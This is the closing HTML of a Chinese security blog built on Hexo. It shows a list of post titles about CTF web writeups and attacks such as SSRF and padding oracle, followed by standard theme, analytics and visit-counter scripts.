    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/07/06/hello-world/">Hello World</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/01/题目-记一次利用gopher的内网mysql盲注/">[题目]记一次利用gopher的内网mysql盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/03/hitctf-Web-Writeup/">[hitctf] Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/26/hitcon2017-Baby-H-master-php-2017-复现/">[hitcon2017] Baby^H-master-php-2017 复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/14/hitcon2017-SSRF-Me复现/">[hitcon2017] SSRF Me复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/08/hitcon2017-Sql-so-hard-复现/">[hitcon2017] Sql-so-hard 复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/23/2017-X-NUCA-总决赛小结/">[2017 X-NUCA]总决赛小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/27/hitcon2017-BabyFirst-Revenge-V2复现/">[hitcon2017] BabyFirst Revenge V2复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/26/hitcon2017-BabyFirst-Revenge复现/">[hitcon2017] BabyFirst Revenge复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/08/Web狗要懂的Padding-Oracle攻击/">Web狗要懂的Padding Oracle攻击</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/24/Web狗要懂的CBC翻转字节攻击-Flipped-Ciphertext-Bits/">Web狗要懂的CBC翻转字节攻击(Flipped Ciphertext Bits)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/10/2017世安杯-决赛Writeup/">[2017世安杯] 决赛Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/09/2017世安杯-初赛Web-Writeup/">[2017世安杯] 初赛Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/24/2017强网杯-线下总结/">[2017强网杯] 线下总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/19/2017WHCTF-Web详细复现-伪-WP/">[2017WHCTF] Web详细复现(伪)WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/11/2017强网杯-Web-Writeup/">[2017强网杯] Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/15/XMAN-线下赛总结/">[XMAN] 线下赛总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/14/2017X-nuca-赛前热身Writeup/">[2017X-nuca] 赛前热身Writeup</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 Pr0ph3t
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-87275583-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->




<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>